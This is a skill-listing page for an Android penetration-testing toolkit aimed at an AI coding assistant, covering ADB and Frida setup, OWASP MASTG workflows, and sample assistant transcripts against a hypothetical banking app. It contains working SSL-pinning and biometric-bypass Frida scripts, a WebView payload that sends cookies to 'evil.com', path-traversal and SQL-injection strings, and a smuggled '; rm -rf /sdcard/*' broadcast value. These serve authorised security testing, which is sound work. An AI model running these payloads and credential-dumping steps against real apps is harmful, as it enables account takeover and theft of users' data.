android-pentest

Comprehensive Android mobile application penetration testing skill with full ADB shell access to rooted devices. This skill should be used when performing security assessments on Android applications including static analysis, dynamic analysis, runtime manipulation, traffic interception, and vulnerability identification. Triggers on requests to pentest Android apps, test mobile security, analyze APKs, bypass security controls, or perform OWASP Mobile Top 10 assessments. (user)

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.


Install skill "android-pentest" with this command: npx skills add hardw00t/ai-security-arsenal/hardw00t-ai-security-arsenal-android-pentest

Android Mobile Application Penetration Testing

This skill enables comprehensive security testing of Android applications through ADB shell access to a rooted Android device and the Android Dynamic MCP server. It covers the full OWASP MASTG methodology from reconnaissance to exploitation and reporting.

When to Use This Skill

This skill should be invoked when:

  • Starting a new Android application security assessment
  • Performing dynamic analysis on Android apps
  • Bypassing security controls (SSL pinning, root detection, anti-tampering)
  • Extracting and analyzing application data
  • Testing authentication and authorization mechanisms
  • Analyzing network communications
  • Fuzzing application components (activities, services, content providers, broadcast receivers)
  • Performing OWASP MASTG compliance testing
  • Writing penetration test reports

Trigger Phrases

  • "pentest this Android app"
  • "security test the APK"
  • "bypass SSL pinning on [app]"
  • "extract data from [app]"
  • "test Android authentication"
  • "fuzz Android intents"
  • "MASTG testing for [app]"
  • "mobile app security assessment"

Prerequisites

Required Tools

| Tool | Purpose | Installation |
|------|---------|--------------|
| ADB | Device communication | apt install adb or Android SDK |
| Frida | Dynamic instrumentation | pip install frida-tools |
| Objection | Mobile exploration | pip install objection |
| apktool | APK decompilation | apt install apktool |
| jadx | Java decompilation | Download from GitHub |
| Burp Suite | Traffic interception | Download from PortSwigger |
| Android Studio | Emulator/tools | Download from Google |

MCP Server Setup

The Android Dynamic MCP server provides comprehensive tooling. Ensure it's configured:

// ~/.claude/mcp.json
{
  "mcpServers": {
    "android-pentest": {
      "command": "python",
      "args": ["/path/to/android-dynamic/server.py"]
    }
  }
}

Mobile MCP for Device Interaction

For advanced device, emulator, and simulator interactions, use Mobile MCP:

  • Repository: https://github.com/mobile-next/mobile-mcp
  • Purpose: Provides MCP-based interaction with Android emulators and physical devices
  • Features: Screen capture, touch automation, app lifecycle management, and UI inspection

// Add to ~/.claude/mcp.json
{
  "mcpServers": {
    "mobile-mcp": {
      "command": "npx",
      "args": ["-y", "@anthropic/mobile-mcp", "--android"]
    }
  }
}

This complements Frida/Objection for scenarios requiring direct device UI interaction.

Device Setup

Physical Device

# 1. Enable Developer Options (tap Build Number 7 times)
# 2. Enable USB Debugging
# 3. Root device (Magisk recommended)

# Install Frida server
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"

Emulator

# Use Android Studio emulator with Google APIs (not Play Store)
# Root with rootAVD or system image without Google Play
# Match Frida server architecture (x86_64 for most emulators)

Verification

# Verify ADB connection
adb devices

# Verify root access
adb shell su -c "id"

# Verify Frida connection
frida-ps -U

# Test MCP server
# In Claude Code: get_app_info("com.android.settings")

Quick Start Guide

1. Initial Setup (2 minutes)

User: I need to pentest the app com.example.targetapp

Claude: I'll set up the testing environment.

[MCP Tool Sequence]
1. get_app_info("com.example.targetapp")
   → Version, permissions, SDK levels, signatures

2. pull_apk("com.example.targetapp")
   → Extract APK for static analysis

3. list_exported_components("com.example.targetapp")
   → Map attack surface (activities, services, providers, receivers)

2. Bypass Security Controls (1 minute)

[MCP Tool Sequence]
1. frida_spawn("com.example.targetapp")
   → PID: 12345

2. frida_bypass_ssl(12345)
   → SSL pinning disabled

3. frida_bypass_root(12345)
   → Root detection bypassed

4. setup_proxy("device-id", "192.168.1.100", 8080)
   → Traffic interception ready

3. Dynamic Analysis

[MCP Tool Sequence]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")

4. Data Extraction

[MCP Tool Sequence]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")

Methodology Reference

| Document | Coverage |
|----------|----------|
| methodology/recon.md | Information gathering, attack surface mapping |
| methodology/static_analysis.md | APK analysis, code review, secrets detection |
| methodology/dynamic_analysis.md | Runtime testing, hooking, instrumentation |
| methodology/network_testing.md | Traffic analysis, API testing, TLS verification |
| methodology/data_storage.md | Local storage, databases, file permissions |
| methodology/crypto_testing.md | Encryption analysis, key management |
| methodology/auth_testing.md | Authentication, session management, biometrics |
| methodology/client_side_injection.md | WebViews, deep links, content providers |

Common Workflows with MCP Tool Sequences

Workflow 1: Complete Application Assessment

# Phase 1: Reconnaissance
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")

# Phase 2: Bypass Protections
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)

# Phase 3: Dynamic Analysis
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")

# Phase 4: Data Extraction
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")

# Phase 5: Component Testing
launch_activity("com.target.app", ".DeepLinkActivity",
                extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
                  "data", ["../../../etc/passwd", "' OR '1'='1"])

# Phase 6: Network Testing
capture_traffic_start("com.target.app")
# [interact with app]
capture_traffic_stop()

Workflow 2: SSL Pinning Bypass

# Method 1: Universal Frida bypass (most apps)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)

# Method 2: Custom script for specific library
frida_run_script(pid, """
Java.perform(function() {
    var CustomPinner = Java.use('com.target.app.security.Pinner');
    CustomPinner.verify.implementation = function() {
        console.log('[+] Bypassed custom pinner');
        return true;
    };
});
""")

# Method 3: If app uses flutter_ssl_pinning
frida_run_script(pid, """
// Flutter bundles its own BoringSSL, so check that the symbol is actually exported
// before attaching: Interceptor.attach(null) throws and kills the script.
var flutter = Process.findModuleByName("libflutter.so");
var setCustomVerify = Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify");
// Keep the callback in a long-lived variable; a NativeCallback created inside
// onEnter can be garbage-collected while native code still holds its pointer.
var alwaysOk = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
if (setCustomVerify === null) {
    console.log('[-] SSL_CTX_set_custom_verify not exported (libflutter.so ' + (flutter ? 'present' : 'absent') + ')');
} else {
    Interceptor.attach(setCustomVerify, {
        onEnter: function(args) {
            args[2] = alwaysOk;   // replace the app's verify callback (0 == ssl_verify_ok)
        }
    });
}
""")

Workflow 3: Authentication Testing

# Hook authentication methods
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")

# Biometric bypass
frida_run_script(pid, "biometric_bypass.js")

# Credential monitoring
frida_run_script(pid, "credential_hooks.js")

# Session manipulation
frida_hook_method(pid, "com.target.app.session.SessionManager", "*")

Workflow 4: Deep Link / Intent Testing

# Map attack surface
components = list_exported_components("com.target.app")

# Test deep links
launch_activity("com.target.app", ".DeepLinkActivity",
                data_uri="targetapp://transfer?amount=1000&to=attacker")

# XSS in WebView
launch_activity("com.target.app", ".WebViewActivity",
                extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})

# Path traversal in file handling
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
    "../../../data/data/com.other.app/databases/secrets.db",
    "file:///data/local/tmp/evil.html",
    "content://com.target.app.provider/../../../etc/passwd"
])

# Content provider SQL injection
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")

# Broadcast injection
send_broadcast("com.target.app.CUSTOM_ACTION",
               extras={"command": "; rm -rf /sdcard/*"})

Workflow 5: Cryptography Analysis

# Hook all crypto operations
frida_run_script(pid, "crypto_hooks.js")

# Detect weak algorithms
frida_run_script(pid, """
Java.perform(function() {
    var Cipher = Java.use('javax.crypto.Cipher');
    Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
        console.log('[CRYPTO] Algorithm: ' + algo);
        if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
        if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
        if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
        return this.getInstance(algo);
    };
});
""")

# Search for hardcoded keys
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")

# Dump encryption keys at runtime
frida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")
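Added example, not one of the skill's bundled scripts: a stricter form of the weak-algorithm check above. It parses the transformation into algorithm and mode rather than substring-matching, so it catches `Cipher.getInstance("AES")` (which Android resolves to AES/ECB/PKCS5Padding) and does not false-positive on Java's nominal `RSA/ECB/...` naming; under Frida it hooks every `getInstance` overload, and in Node it only exposes the classifier for testing.

```javascript
'use strict';

// Classify a javax.crypto.Cipher transformation ("ALGORITHM/MODE/PADDING").
// Returns an array of finding strings; an empty array means nothing was flagged.
function assessTransformation(transformation) {
  const findings = [];
  const parts = String(transformation).split('/');
  const algorithm = parts[0].trim().toUpperCase();
  const mode = parts.length > 1 ? parts[1].trim().toUpperCase() : '';

  // Broken or legacy algorithms. The substring checks in the hook above
  // would flag DES and RC4 but miss the aliases (ARCFOUR, DESede).
  if (algorithm === 'DES') findings.push('WEAK: DES (56-bit key)');
  if (algorithm === 'DESEDE' || algorithm === 'TRIPLEDES') findings.push('WEAK: 3DES (64-bit block)');
  if (algorithm === 'RC4' || algorithm === 'ARCFOUR') findings.push('WEAK: RC4');
  if (algorithm === 'RC2' || algorithm === 'BLOWFISH') findings.push('WEAK: ' + algorithm + ' (64-bit block)');

  // Mode checks only make sense for block ciphers. RSA is deliberately absent:
  // "RSA/ECB/OAEP..." is Java's naming convention, not a real ECB mode.
  const blockCiphers = ['AES', 'DES', 'DESEDE', 'TRIPLEDES', 'BLOWFISH', 'RC2'];
  if (blockCiphers.indexOf(algorithm) !== -1) {
    if (mode === 'ECB') {
      findings.push('WEAK: ECB mode');
    } else if (mode === '') {
      // A bare algorithm name takes the provider default, which on Android is
      // ECB/PKCS5Padding, so a search for the substring "ECB" never sees it.
      findings.push('WEAK: no mode given, provider default is ECB');
    } else if (['CBC', 'CTR', 'CFB', 'OFB'].indexOf(mode) !== -1) {
      findings.push('INFO: unauthenticated mode ' + mode + ', confirm a MAC covers the ciphertext');
    }
  }
  return findings;
}

// When loaded by Frida the Java bridge exists: hook every getInstance overload,
// including the (String, Provider) and (String, String) forms the hook above skips.
function installCipherHook() {
  Java.perform(function () {
    const Cipher = Java.use('javax.crypto.Cipher');
    Cipher.getInstance.overloads.forEach(function (overload) {
      overload.implementation = function () {
        const transformation = arguments[0];
        const findings = assessTransformation(transformation);
        console.log('[CRYPTO] ' + transformation +
          (findings.length ? ' -> ' + findings.join('; ') : ' (nothing flagged)'));
        return overload.apply(this, arguments);
      };
    });
  });
}

if (typeof Java !== 'undefined') {
  installCipherHook();
}
```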

Workflow 6: Data Exfiltration Analysis

# Full data dump
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")

# Analyze for sensitive data
# Look for: tokens, passwords, PII, financial data, session IDs

# Monitor data writes in real-time
frida_run_script(pid, """
Java.perform(function() {
    var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
    SharedPrefs.putString.implementation = function(key, value) {
        console.log('[PREFS] ' + key + ' = ' + value);
        return this.putString(key, value);
    };
});
""")
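Added example, not part of the skill: an offline triage pass over a dumped SharedPreferences XML file of the kind dump_shared_prefs returns, flagging JWTs (with the alg from their header), hex digests, base64 blobs and credential-looking key names with a MASTG-style severity, which is the "look for tokens, passwords, session IDs" step above. The sample XML is constructed, and the key-name pattern and length thresholds are assumptions to tune per app.

```javascript
'use strict';

// Constructed sample of a dumped SharedPreferences file (not real app data).
const SAMPLE_PREFS_XML = [
  '<?xml version="1.0" encoding="utf-8" standalone="yes" ?>',
  '<map>',
  '    <string name="auth_token">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0In0.c2lnbmF0dXJl</string>',
  '    <string name="refresh_token">dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4=</string>',
  '    <string name="pin_hash">5e884898da28047d916609c11c4dd2d0a1b2c3d4</string>',
  '    <string name="theme">dark</string>',
  '    <boolean name="onboarding_done" value="true" />',
  '</map>'
].join('\n');

// Heuristics (assumed, adjust per target): key names that usually hold secrets,
// and value shapes that are worth a look even under an innocuous key name.
const SENSITIVE_KEY = /(token|secret|passw|pin|api[_-]?key|session|credential|auth)/i;
const JWT_RE = /^eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$/;
const HEX_RE = /^[0-9a-f]{32,}$/i;
const B64_RE = /^[A-Za-z0-9+/]{24,}={0,2}$/;

// Decode one base64url JWT segment to JSON; null if it is not valid JSON.
function decodeJwtPart(part) {
  let b64 = part.replace(/-/g, '+').replace(/_/g, '/');
  while (b64.length % 4 !== 0) b64 += '=';
  try {
    return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
  } catch (e) {
    return null;
  }
}

// Walk every <string> entry and return the ones that look like stored secrets.
function scanSharedPrefs(xml) {
  const findings = [];
  const entry = /<string name="([^"]+)">([^<]*)<\/string>/g;
  let m;
  while ((m = entry.exec(xml)) !== null) {
    const key = m[1];
    const value = m[2];
    let kind = null;
    if (JWT_RE.test(value)) {
      const header = decodeJwtPart(value.split('.')[0]);
      kind = 'JWT (alg=' + (header && header.alg ? header.alg : 'unknown') + ')';
    } else if (HEX_RE.test(value)) {
      kind = 'hex digest';
    } else if (B64_RE.test(value)) {
      kind = 'base64 blob';
    }
    const sensitiveName = SENSITIVE_KEY.test(key);
    if (!kind && !sensitiveName) continue;   // e.g. theme=dark: nothing to report
    findings.push({
      key: key,
      kind: kind || 'opaque value',
      severity: sensitiveName ? 'HIGH' : 'MEDIUM',   // plaintext under a credential key name
      mastg: 'MASTG-TEST-0001'
    });
  }
  return findings;
}

// Print the result as the report-style table used in the examples on this page.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('| Key | Kind | Severity |');
  console.log('|-----|------|----------|');
  for (const f of scanSharedPrefs(SAMPLE_PREFS_XML)) {
    console.log('| ' + f.key + ' | ' + f.kind + ' | ' + f.severity + ' |');
  }
}
```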

MCP Tool Reference

Device Interaction

| Tool | Description | Example |
|------|-------------|---------|
| get_screen_state() | Current screen/UI elements | Finding clickable elements |
| tap_element(x, y) | Tap at coordinates | Automating login flow |
| input_text(text) | Type into focused field | Entering credentials |
| press_key(keycode) | Press key | BACK=4, HOME=3, ENTER=66 |
| swipe(x1, y1, x2, y2) | Swipe gesture | Scrolling, pattern unlock |
| long_press(x, y) | Long press | Context menus |

Frida Instrumentation

| Tool | Description | Example |
|------|-------------|---------|
| frida_spawn(package) | Start with Frida | Initial attachment |
| frida_attach(package) | Attach to running | Already running app |
| frida_run_script(pid, script) | Run Frida script | Custom hooks |
| frida_bypass_ssl(pid) | Bypass SSL pinning | Enable interception |
| frida_bypass_root(pid) | Bypass root detection | Evade security |
| frida_hook_method(pid, class, method) | Hook method | Trace calls |
| frida_trace_crypto(pid) | Trace crypto | Key extraction |
| frida_dump_credentials(pid) | Dump credentials | Credential theft |
| frida_enumerate_classes(pid, pattern) | List classes | Class discovery |
| frida_memory_search(pid, pattern) | Search memory | Find secrets |

Network Tools

| Tool | Description | Example |
|------|-------------|---------|
| setup_proxy(device, host, port) | Configure proxy | Burp interception |
| clear_proxy(device) | Remove proxy | Cleanup |
| install_ca_cert(device, path) | Install CA cert | Trust Burp CA |
| capture_traffic_start(package) | Start capture | Record traffic |
| capture_traffic_stop() | Stop capture | Save PCAP |

Data Extraction

| Tool | Description | Example |
|------|-------------|---------|
| dump_databases(package) | Extract SQLite DBs | User data, creds |
| dump_shared_prefs(package) | Get preferences | Tokens, settings |
| dump_internal_storage(package) | Internal files | Config, certs |
| dump_external_storage(package) | SD card files | Exports, cache |
| get_logcat(package) | Filtered logs | Debug info leak |

Component Testing

| Tool | Description | Example |
|------|-------------|---------|
| list_exported_components(package) | Map attack surface | Find entry points |
| launch_activity(pkg, activity, extras) | Start activity | Deep link test |
| send_broadcast(action, extras) | Send broadcast | Broadcast injection |
| start_service(pkg, service, extras) | Start service | Service abuse |
| query_content_provider(uri) | Query provider | Data leakage |
| fuzz_intent_extra(pkg, comp, key, payloads) | Fuzz intents | Find vulns |

App Management

| Tool | Description | Example |
|------|-------------|---------|
| install_apk(path) | Install APK | Deploy test build |
| uninstall_app(package) | Remove app | Cleanup |
| clear_app_data(package) | Clear data | Fresh state |
| get_app_info(package) | App metadata | Permissions, SDK |
| list_installed_apps() | All packages | Discovery |
| pull_apk(package) | Extract APK | Static analysis |

Frida Script Library

Pre-built scripts in /scripts/ directory:

| Script | Purpose |
|--------|---------|
| ssl_pinning_bypass.js | Universal SSL/TLS pinning bypass |
| root_bypass.js | Root detection bypass |
| crypto_hooks.js | Cryptographic operation monitoring |
| credential_hooks.js | Credential capture |
| network_hooks.js | Network traffic monitoring |
| biometric_bypass.js | Biometric authentication bypass |
| anti_tampering_bypass.js | Anti-tampering/debugger bypass |
| intent_monitor.js | Intent/IPC monitoring |
| webview_hooks.js | WebView security monitoring |
| dynamic_dex_hooks.js | Dynamic code loading detection |
| keystore_hooks.js | Android Keystore monitoring |
| method_tracer.js | Generic method tracing |

Troubleshooting Guide

Frida Issues

"Failed to spawn: unable to find application"

# Solution: Verify package name
list_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name>

"Failed to attach: process not found"

# Solution: App not running, use spawn instead
pid = frida_spawn("com.target.app")  # Instead of frida_attach

"Script terminated with error"

# Solution: Class/method not found
frida_enumerate_classes(pid, "*TargetClass*")  # Find exact class
# Check for obfuscation - class names may be: a, b, c, etc.

Frida server crashes

# Solution: Version mismatch
frida --version  # Check client version
# Download matching server from https://github.com/frida/frida/releases

SSL Pinning Issues

Universal bypass doesn't work

# Solution: Custom pinning implementation
1. Decompile APK with jadx
2. Search: "certificate", "pin", "ssl", "trust"
3. Identify custom class and method
4. Write targeted Frida hook

# Check for: OkHttp CertificatePinner, custom TrustManager,
# native SSL verification, Network Security Config

App still fails after bypass

# Solution: Multiple pinning layers
1. Check for native SSL verification (libssl.so)
2. Use anti_tampering_bypass.js for Frida detection bypass
3. Try objection: android sslpinning disable
4. Consider frida-gadget for persistent injection

Root Detection Issues

App detects root and exits

# Solution: Multiple detection vectors
1. Use comprehensive root_bypass.js
2. Enable Magisk Hide / Zygisk DenyList
3. Check for native root checks (hook fopen, access)
4. Consider frida-gadget embedded in APK

App detects Frida

# Solution: Frida detection in place
1. Use anti_tampering_bypass.js first
2. Rename frida-server binary
3. Use frida-gadget instead
4. Hook pthread_create to hide Frida threads

ADB Issues

"device unauthorized"

adb kill-server
adb start-server
# Accept prompt on device

"Permission denied" for data

adb root  # If using userdebug build
adb shell su -c "cat /data/data/<pkg>/..."  # With root

Data Extraction Issues

Database is encrypted (SQLCipher)

# Hook to capture password
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")

# Or search memory for key
frida_memory_search(pid, "x]@1#%hJ")  # Common patterns

Checklists Reference

| Checklist | Purpose |
|-----------|---------|
| checklists/owasp_mastg_full.md | Complete MASTG compliance |
| checklists/quick_wins.md | Fast vulnerability finding |
| checklists/pre_engagement.md | Setup verification |
| checklists/report_items.md | Report completeness |

Templates Reference

| Template | Purpose |
|----------|---------|
| templates/finding_template.md | Individual finding docs |
| templates/executive_summary.md | Management summary |
| templates/technical_report.md | Full technical report |
| templates/remediation_guide.md | Developer fixes |

Example Claude Code Interactions

Example 1: Starting New Assessment

User: I need to pentest com.megabank.mobile. It has SSL pinning and root
detection.

Claude: I'll set up the testing environment for com.megabank.mobile.

[Executes MCP tools]

1. Getting app information:
   > get_app_info("com.megabank.mobile")

   Version: 3.2.1, Target SDK: 33, Min SDK: 26
   Permissions: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...

2. Extracting APK:
   > pull_apk("com.megabank.mobile")

   Saved to: /tmp/com.megabank.mobile.apk

3. Mapping attack surface:
   > list_exported_components("com.megabank.mobile")

   Exported Activities:
   - com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
   - com.megabank.mobile.ShareReceiveActivity

   Content Providers:
   - com.megabank.mobile.provider.DocumentProvider (exported)

   Broadcast Receivers:
   - com.megabank.mobile.PushReceiver

4. Starting with Frida and bypassing protections:
   > frida_spawn("com.megabank.mobile")
   PID: 12345

   > frida_bypass_ssl(12345)
   [+] SSL pinning bypass active - hooked 8 methods

   > frida_bypass_root(12345)
   [+] Root detection bypass active

5. Configuring traffic interception:
   > setup_proxy("emulator-5554", "192.168.1.100", 8080)
   [+] Proxy configured

Environment ready. I've identified 3 potential entry points for testing:
1. Deep link handler (megabank://) - test for URL scheme hijacking
2. DocumentProvider - test for path traversal
3. PushReceiver - test for broadcast injection

Would you like me to proceed with dynamic analysis or test specific components?

Example 2: Data Storage Investigation

User: Check what sensitive data this app stores locally

Claude: I'll perform comprehensive data storage analysis.

[Executes MCP tools]

1. SharedPreferences analysis:
   > dump_shared_prefs("com.megabank.mobile")

   [!] FINDING in auth_prefs.xml:
   - auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
   - refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
   - pin_hash: "5e884898da28047d9166..."

   Severity: HIGH - Authentication tokens stored in plaintext
   MASTG: MASTG-TEST-0001 (Insecure Data Storage)

2. Database analysis:
   > dump_databases("com.megabank.mobile")

   Found: app_data.db (356 KB)

   [!] FINDING:
   - Table 'accounts': account_number, balance, last_transaction
   - Table 'transactions': 847 records with transaction history
   - Table 'cached_credentials': username, password_hash

   Severity: HIGH - Financial data in unencrypted database
   MASTG: MASTG-TEST-0001

3. Internal storage:
   > dump_internal_storage("com.megabank.mobile")

   [!] FINDING: /files/user_profile.json
   Contains: full_name, email, phone, ssn_last_4

   Severity: MEDIUM - PII in plaintext file

4. External storage:
   > dump_external_storage("com.megabank.mobile")

   [!] FINDING: /Android/data/com.megabank.mobile/files/exports/
   - statements_2024.pdf (world-readable)

   Severity: MEDIUM - Sensitive docs on external storage
   MASTG: MASTG-TEST-0003

Summary:
| Finding | Severity | MASTG ID |
|---------|----------|----------|
| Auth tokens in SharedPreferences | High | MASTG-TEST-0001 |
| Unencrypted SQLite database | High | MASTG-TEST-0001 |
| PII in plaintext files | Medium | MASTG-TEST-0002 |
| Docs on external storage | Medium | MASTG-TEST-0003 |

Example 3: Authentication Bypass

User: Test the authentication for vulnerabilities

Claude: I'll test authentication mechanisms comprehensively.

[Executes MCP tools]

1. Hooking authentication flow:
   > frida_run_script(12345, "credential_hooks.js")

   [HOOK] SharedPreferences write: auth_token = eyJ...
   [HOOK] HTTP Header: Authorization: Bearer eyJ...

2. Biometric testing:
   > frida_run_script(12345, "biometric_bypass.js")

   [HOOK] BiometricPrompt.authenticate() called
   [BYPASS] Simulating successful authentication

   [!] FINDING: Biometric bypass successful
   - App accepts fake biometric success callback
   - No server-side verification

   Severity: HIGH - Authentication bypass
   MASTG: MASTG-TEST-0015

3. Session analysis:
   > frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")

   [HOOK] validateSession(): Only checks local JWT expiry
   [HOOK] refreshSession(): No server round-trip

   [!] FINDING: Client-side session validation
   - JWT expiry can be modified locally
   - Sessions never verified server-side

   Severity: HIGH - Broken session management
   MASTG: MASTG-TEST-0016

4. Token analysis:
   > frida_run_script(12345, """
   Java.perform(function() {
       var JWT = Java.use('com.auth0.jwt.JWT');
       JWT.decode.implementation = function(token) {
           console.log('[JWT] ' + token);
           return this.decode(token);
       };
   });
   """)

   [!] FINDING: JWT uses HS256 (weak algorithm)
   [!] FINDING: JWT contains: account_id, role, permissions

Findings Summary:
| Issue | Severity | Impact |
|-------|----------|--------|
| Biometric bypass | High | Full account access |
| Client-side sessions | High | Persistent unauthorized access |
| Weak JWT algorithm | Medium | Potential token forgery |

Bundled Resources

scripts/

  • ssl_pinning_bypass.js - Universal SSL pinning bypass
  • root_bypass.js - Root detection bypass
  • crypto_hooks.js - Crypto operation monitoring
  • keystore_hooks.js - Android Keystore hooks
  • method_tracer.js - Generic method tracing
  • extract_apk.py - APK extraction tool
  • content_provider_scanner.py - Content provider enumeration
  • intent_fuzzer.py - Intent fuzzing automation

references/

  • owasp_mobile_top10.md - OWASP Mobile Top 10
  • android_security_checklist.md - Testing checklist
  • frida_snippets.md - Common Frida code snippets

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.
